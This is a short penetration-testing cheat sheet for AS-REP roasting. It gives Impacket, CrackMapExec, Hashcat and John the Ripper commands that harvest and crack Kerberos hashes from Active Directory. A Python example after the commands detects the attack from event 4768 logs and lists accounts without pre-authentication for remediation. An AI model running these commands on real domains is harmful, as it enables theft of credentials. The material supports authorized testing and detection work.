Disclaimer: This material is provided for educational purposes and authorized security testing only. You are solely responsible for how you use the information. Do not use these techniques on systems without explicit permission from the owner. We do not encourage any kind of illegal or harmful activity.
Using Impacket GetNPUsers.py
- Update the package list:
- Install Impacket:
sudo apt-get install python3-impacket
- Enumerate accounts:
impacket-GetNPUsers -dc-ip [IP_ADDRESS] example.local/ -usersfile users.txt -no-pass -outputfile asrep_hashes.txt
- Crack AS-REP hashes using Hashcat:
hashcat -m 18200 -a 0 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
- Crack AS-REP hashes using John the Ripper:
john --format=krb5asrep --wordlist=wordlist.txt asrep_hashes.txt
Using CrackMapExec
- Enumerate accounts and retrieve AS-REP hashes:
crackmapexec ldap [IP_ADDRESS] -u users.txt -p '' --asreproast asrep_hashes.txt
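
The detection side of the commands above, as an added example (not part of the original page, Impacket or CrackMapExec): a TGT issued to an account that has pre-authentication disabled is logged on the domain controller as Security event 4768 with Pre-Authentication Type 0, and one source doing this for several accounts matches the -usersfile enumeration. The event records, account names, addresses and the min_accounts threshold are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample records (not real logs) using the EventData field names
# of Security event 4768; accounts and addresses are made up.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "alice", "IpAddress": "::ffff:10.0.0.21",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "svc_backup", "IpAddress": "::ffff:10.0.0.99",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "svc_legacy", "IpAddress": "::ffff:10.0.0.99",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "SVC_BACKUP", "IpAddress": "::ffff:10.0.0.40",
     "PreAuthType": "0", "TicketEncryptionType": "0x12", "Status": "0x0"},
]

RC4_HMAC = "0x17"  # etype 23, the type hashcat mode 18200 expects


def _no_preauth(events):
    """Yield (account, source_ip, etype) for successful TGTs issued without pre-auth."""
    for ev in events:
        if ev.get("EventID") != 4768 or ev.get("Status") != "0x0":
            continue
        if ev.get("PreAuthType") != "0":
            continue
        ip = ev.get("IpAddress", "")
        if ip.startswith("::ffff:"):  # IPv4-mapped form used in the event
            ip = ip[7:]
        yield ev["TargetUserName"].lower(), ip, ev.get("TicketEncryptionType", "").lower()


def accounts_without_preauth(events):
    """Remediation list: accounts the KDC served without pre-authentication."""
    return sorted({account for account, _, _ in _no_preauth(events)})


def suspicious_sources(events, min_accounts=2):
    """Sources that pulled no-preauth TGTs for min_accounts or more distinct accounts."""
    seen = defaultdict(lambda: {"accounts": set(), "rc4": set()})
    for account, ip, etype in _no_preauth(events):
        seen[ip]["accounts"].add(account)
        if etype == RC4_HMAC:
            seen[ip]["rc4"].add(account)
    return [{"source": ip, "accounts": sorted(v["accounts"]), "rc4_accounts": sorted(v["rc4"])}
            for ip, v in sorted(seen.items()) if len(v["accounts"]) >= min_accounts]


if __name__ == "__main__":
    print(accounts_without_preauth(SAMPLE_EVENTS))
    print(suspicious_sources(SAMPLE_EVENTS))
```

Every account returned by accounts_without_preauth has "Do not require Kerberos preauthentication" set and is a candidate for re-enabling pre-authentication or, where that is not possible, a long random password.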